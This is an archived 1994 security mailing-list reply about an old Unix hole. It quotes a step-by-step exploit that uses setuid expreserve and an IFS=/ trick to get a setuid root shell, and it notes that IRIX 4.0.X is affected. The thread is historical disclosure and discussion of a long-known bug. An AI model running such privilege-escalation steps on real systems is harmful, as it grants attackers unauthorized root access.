Re: chmod 000 .rhosts - works?

jsz (jsz@ramon.bgu.ac.il)
Sat, 15 Oct 94 16:17:00 IST

Messages sorted by: [ date ][ thread ][ subject ][ author ]
Next message: Nick Andrew: "Re: Internet Worm (fwd)"
Previous message: jsz: "Re: finger-bombing, abuse timeout"
In reply to: Charles Howes: "Re: chmod 000 .rhosts - works?"
Next in thread: Chris Ellwood: "Re: chmod 000 .rhosts - works?"

> 
> ObBug: vi runs expreserve when it crashes or you type ':pre' (on some
>   versions).  Expreserve is setuid root.  Expreserve runs /bin/mail
>   with 'system()'.  So, do the following:
>     % cd /tmp
>     % cp /bin/sh fubar
>     % cat > bin
>     chmod 4755 fubar
>     ^D
>     % chmod u+x fubar
>     % setenv IFS=/
>     % vi
>     :pre
>     :q
>     % fubar
>     #

It has been known since 1986? You'll find IRIX 4.0.X vulnerable to it,
but expreserve is sgid sys, so you'd get access to read kmem tables --

Regards

----

Next message: Nick Andrew: "Re: Internet Worm (fwd)"
Previous message: jsz: "Re: finger-bombing, abuse timeout"
In reply to: Charles Howes: "Re: chmod 000 .rhosts - works?"
Next in thread: Chris Ellwood: "Re: chmod 000 .rhosts - works?"